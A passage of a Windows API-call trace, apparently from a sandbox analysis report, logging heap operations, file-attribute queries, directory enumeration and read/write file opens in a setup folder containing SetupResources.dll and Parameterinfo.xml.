lpWideCharStr="C:\\588bce7c90097ed212\\3082\\SetupResources.dll") returned 46 [0061.904] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\3082\\SetupResources.dll" (normalized: "c:\\588bce7c90097ed212\\3082\\setupresources.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x41c [0061.904] GetFileType (hFile=0x41c) returned 0x1 [0061.904] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x715b8 | out: hHeap=0x20000) returned 1 [0061.904] CloseHandle (hObject=0x41c) returned 1 [0061.904] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4de70 [0061.904] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dfc0 [0061.904] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dff8 [0061.904] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e228 [0061.904] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dff8 | out: hHeap=0x20000) returned 1 [0061.904] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dfc0 | out: hHeap=0x20000) returned 1 [0061.904] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4de70 | out: hHeap=0x20000) returned 1 [0061.904] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e228 | out: hHeap=0x20000) returned 1 [0061.904] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dfc0 [0061.904] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e068 [0061.904] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e298 [0061.904] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e0d8 [0061.904] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e298 | out: hHeap=0x20000) returned 1 [0061.904] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e068 | out: hHeap=0x20000) returned 1 [0061.904] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dfc0 | out: hHeap=0x20000) returned 1 [0061.904] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e0d8 | out: hHeap=0x20000) returned 1 [0061.904] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e458 [0061.904] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e228 [0061.904] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e298 [0061.904] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e180 [0061.905] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e298 | out: hHeap=0x20000) returned 1 [0061.905] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e228 | out: hHeap=0x20000) returned 1 [0061.905] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e458 | out: hHeap=0x20000) returned 1 [0061.905] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e340 [0061.905] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e180 | out: hHeap=0x20000) returned 1 [0061.905] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4de70 [0061.905] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e340 | out: hHeap=0x20000) returned 1 [0061.905] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4de70 | out: hHeap=0x20000) returned 1 [0061.905] AreFileApisANSI () returned 1 [0061.905] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e030, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 46 [0061.905] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x5c) returned 0x71a98 [0061.905] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e030, cbMultiByte=-1, lpWideCharStr=0x71a98, cchWideChar=46 | out: lpWideCharStr="C:\\588bce7c90097ed212\\3082\\SetupResources.dll") returned 46 [0061.905] GetFileAttributesExW (in: lpFileName="C:\\588bce7c90097ed212\\3082\\SetupResources.dll" (normalized: "c:\\588bce7c90097ed212\\3082\\setupresources.dll"), fInfoLevelId=0x0, lpFileInformation=0x313f6c0 | out: lpFileInformation=0x313f6c0*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xe40ff600, ftCreationTime.dwHighDateTime=0x1cac6d7, ftLastAccessTime.dwLowDateTime=0xe40ff600, ftLastAccessTime.dwHighDateTime=0x1cac6d7, ftLastWriteTime.dwLowDateTime=0xe40ff600, ftLastWriteTime.dwHighDateTime=0x1cac6d7, nFileSizeHigh=0x0, nFileSizeLow=0x4958)) returned 1 [0061.905] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71a98 | out: hHeap=0x20000) returned 1 [0061.905] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d050 | out: hHeap=0x20000) returned 1 [0061.905] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d070 | out: hHeap=0x20000) returned 1 [0061.905] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e030 | out: hHeap=0x20000) returned 1 [0061.905] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0061.905] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0061.905] FindNextFileW (in: hFindFile=0x78250, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x313f498, ftCreationTime.dwHighDateTime=0x5a, ftLastAccessTime.dwLowDateTime=0x313f420, ftLastAccessTime.dwHighDateTime=0x77892b2c, ftLastWriteTime.dwLowDateTime=0x46bb0, ftLastWriteTime.dwHighDateTime=0x313f210, nFileSizeHigh=0x5a, nFileSizeLow=0x0, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="ce", cAlternateFileName="渘Ĉ㪀ā湈Ĉ̓䥘")) returned 0 [0061.905] FindClose (in: hFindFile=0x78250 | out: hFindFile=0x78250) returned 1 [0061.905] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfb0 [0061.905] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f088 [0061.905] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfb0 | out: hHeap=0x20000) returned 1 [0061.905] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f088 | out: hHeap=0x20000) returned 1 [0061.905] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53298 | out: hHeap=0x20000) returned 1 [0061.905] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dea8 | out: hHeap=0x20000) returned 1 [0061.905] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53838 | out: hHeap=0x20000) returned 1 [0061.905] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf00 | out: hHeap=0x20000) returned 1 [0061.905] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f2c8 | out: hHeap=0x20000) returned 1 [0061.905] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x45fd8 | out: hHeap=0x20000) returned 1 [0061.905] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf00 [0061.905] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f2c8 [0061.906] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf00 | out: hHeap=0x20000) returned 1 [0061.906] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f2c8 | out: hHeap=0x20000) returned 1 [0061.906] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d070 [0061.906] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f2c8 [0061.906] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d070 | out: hHeap=0x20000) returned 1 [0061.906] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f2c8 | out: hHeap=0x20000) returned 1 [0061.906] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e458 [0061.906] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x46) returned 0x694e0 [0061.906] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e458 | out: hHeap=0x20000) returned 1 [0061.906] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53640 [0061.906] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x694e0 | out: hHeap=0x20000) returned 1 [0061.906] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0061.906] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0061.906] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0061.906] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0061.906] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53640 | out: hHeap=0x20000) returned 1 [0061.906] AreFileApisANSI () returned 1 [0061.906] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\588bce7c90097ed212\\Client", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\588bce7c90097ed212\\Client", lpUsedDefaultChar=0x0) returned 29 [0061.906] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0061.906] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0061.906] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0061.906] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfa0 [0061.906] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfb0 [0061.906] AreFileApisANSI () returned 1 [0061.906] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x88658, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 29 [0061.906] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x3a) returned 0x53298 [0061.906] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x88658, cbMultiByte=-1, lpWideCharStr=0x53298, cchWideChar=29 | out: lpWideCharStr="C:\\588bce7c90097ed212\\Client") returned 29 [0061.906] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\Client" (normalized: "c:\\588bce7c90097ed212\\client"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0061.907] GetLastError () returned 0x5 [0061.907] GetLastError () returned 0x5 [0061.907] SetLastError (dwErrCode=0x5) [0061.907] GetLastError () returned 0x5 [0061.907] SetLastError (dwErrCode=0x5) [0061.907] GetLastError () returned 0x5 [0061.907] SetLastError (dwErrCode=0x5) [0061.907] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53298 | out: hHeap=0x20000) returned 1 [0061.907] AreFileApisANSI () returned 1 [0061.907] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x88658, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 29 [0061.907] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x3a) returned 0x53640 [0061.907] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x88658, cbMultiByte=-1, lpWideCharStr=0x53640, cchWideChar=29 | out: lpWideCharStr="C:\\588bce7c90097ed212\\Client") returned 29 [0061.907] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\Client" (normalized: "c:\\588bce7c90097ed212\\client"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0061.907] GetLastError () returned 0x5 [0061.907] GetLastError () returned 0x5 [0061.907] SetLastError (dwErrCode=0x5) [0061.907] GetLastError () returned 0x5 [0061.907] SetLastError (dwErrCode=0x5) [0061.907] GetLastError () returned 0x5 [0061.907] SetLastError (dwErrCode=0x5) [0061.907] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53640 | out: hHeap=0x20000) returned 1 [0061.907] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfb0 | out: hHeap=0x20000) returned 1 [0061.907] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfa0 | out: hHeap=0x20000) returned 1 [0061.907] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0061.907] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0061.908] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0061.908] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0061.908] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0061.908] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4de70 [0061.908] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x46) returned 0x68d60 [0061.908] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4de70 | out: hHeap=0x20000) returned 1 [0061.908] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53838 [0061.908] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x68d60 | out: hHeap=0x20000) returned 1 [0061.908] FindNextFileW (in: hFindFile=0x78e50, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xbc518d00, ftCreationTime.dwHighDateTime=0x1ca2a28, ftLastAccessTime.dwLowDateTime=0xbc518d00, ftLastAccessTime.dwHighDateTime=0x1ca2a28, ftLastWriteTime.dwLowDateTime=0xbc518d00, ftLastWriteTime.dwHighDateTime=0x1ca2a28, nFileSizeHigh=0x0, nFileSizeLow=0x3ef6, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="DHtmlHeader.html", cAlternateFileName="DHTMLH~1.HTM")) returned 1 [0061.908] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0061.908] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e260 [0061.908] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0061.908] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e228 [0061.908] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e458 [0061.908] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4de70 [0061.908] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e458 | out: hHeap=0x20000) returned 1 [0061.908] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e228 | out: hHeap=0x20000) returned 1 [0061.908] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e260 | out: hHeap=0x20000) returned 1 [0061.908] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e378 [0061.908] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4de70 | out: hHeap=0x20000) returned 1 [0061.908] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfa0 [0061.908] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f088 [0061.908] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x536d0 [0061.908] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x533b8 [0061.908] FindFirstFileExW (in: lpFileName="C:\\588bce7c90097ed212\\Client\\*", fInfoLevelId=0x0, lpFindFileData=0x313ef40, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x0 | out: lpFindFileData=0x313ef40) returned 0x78090 [0061.909] FindNextFileW (in: hFindFile=0x78090, lpFindFileData=0x313ecc4 | out: lpFindFileData=0x313ecc4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf3768b28, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf3768b28, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf378ed8a, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0061.909] FindNextFileW (in: hFindFile=0x78090, lpFindFileData=0x313ecc4 | out: lpFindFileData=0x313ecc4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xce2bc00, ftCreationTime.dwHighDateTime=0x1cac6d5, ftLastAccessTime.dwLowDateTime=0xce2bc00, ftLastAccessTime.dwHighDateTime=0x1cac6d5, ftLastWriteTime.dwLowDateTime=0xce2bc00, ftLastWriteTime.dwHighDateTime=0x1cac6d5, nFileSizeHigh=0x0, nFileSizeLow=0x31444, dwReserved0=0x0, dwReserved1=0x0, cFileName="Parameterinfo.xml", cAlternateFileName="PARAME~1.XML")) returned 1 [0061.909] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x533b8 | out: hHeap=0x20000) returned 1 [0061.909] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0061.909] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e228 [0061.909] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0061.909] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4de70 [0061.909] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df50 [0061.909] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dea8 [0061.909] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df50 | out: hHeap=0x20000) returned 1 [0061.909] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4de70 | out: hHeap=0x20000) returned 1 [0061.909] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e228 | out: hHeap=0x20000) returned 1 [0061.909] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e298 [0061.909] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dea8 | out: hHeap=0x20000) returned 1 [0061.909] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x538c8 [0061.909] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x68) returned 0x46668 [0061.909] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53838 | out: hHeap=0x20000) returned 1 [0061.909] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d010 [0061.909] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f0c8 [0061.909] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d010 | out: hHeap=0x20000) returned 1 [0061.910] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f0c8 | out: hHeap=0x20000) returned 1 [0061.910] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfb0 [0061.910] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f2c8 [0061.910] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfb0 | out: hHeap=0x20000) returned 1 [0061.910] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f2c8 | out: hHeap=0x20000) returned 1 [0061.910] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4de70 [0061.910] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53298 [0061.910] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e3e8 [0061.910] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71bd0 [0061.910] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53298 | out: hHeap=0x20000) returned 1 [0061.910] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e3e8 | out: hHeap=0x20000) returned 1 [0061.910] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71ca0 [0061.910] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71bd0 | out: hHeap=0x20000) returned 1 [0061.910] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0061.910] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0061.910] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0061.910] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0061.910] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71ca0 | out: hHeap=0x20000) returned 1 [0061.910] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4de70 | out: hHeap=0x20000) returned 1 [0061.910] AreFileApisANSI () returned 1 [0061.910] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\588bce7c90097ed212\\Client\\Parameterinfo.xml", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\588bce7c90097ed212\\Client\\Parameterinfo.xml", lpUsedDefaultChar=0x0) returned 47 [0061.910] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df50 [0061.910] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0061.910] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0061.910] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d090 [0061.910] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfb0 [0061.910] AreFileApisANSI () returned 1 [0061.910] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4df50, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 47 [0061.910] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x5e) returned 0x71960 [0061.910] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4df50, cbMultiByte=-1, lpWideCharStr=0x71960, cchWideChar=47 | out: lpWideCharStr="C:\\588bce7c90097ed212\\Client\\Parameterinfo.xml") returned 47 [0061.911] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\Client\\Parameterinfo.xml" (normalized: "c:\\588bce7c90097ed212\\client\\parameterinfo.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x41c [0061.911] GetFileType (hFile=0x41c) returned 0x1 [0061.911] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71960 | out: hHeap=0x20000) returned 1 [0061.911] SetFilePointerEx (in: hFile=0x41c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0061.911] SetFilePointerEx (in: hFile=0x41c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0061.911] SetFilePointerEx (in: hFile=0x41c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0061.911] CloseHandle (hObject=0x41c) returned 1 [0061.911] AreFileApisANSI () returned 1 [0061.911] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4df50, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 47 [0061.911] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x5e) returned 0x71a30 [0061.912] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4df50, cbMultiByte=-1, lpWideCharStr=0x71a30, cchWideChar=47 | out: lpWideCharStr="C:\\588bce7c90097ed212\\Client\\Parameterinfo.xml") returned 47 [0061.912] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\Client\\Parameterinfo.xml" (normalized: "c:\\588bce7c90097ed212\\client\\parameterinfo.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x41c [0061.912] GetFileType (hFile=0x41c) returned 0x1 [0061.912] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71a30 | out: hHeap=0x20000) returned 1 [0061.912] CloseHandle (hObject=0x41c) returned 1 [0061.912] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e458 [0061.912] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e260 [0061.912] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4de70 [0061.912] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dea8 [0061.912] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4de70 | out: hHeap=0x20000) returned 1 [0061.912] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e260 | out: hHeap=0x20000) returned 1 [0061.912] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e458 | out: hHeap=0x20000) returned 1 [0061.912] HeapFree (in: hHeap=0x20000, 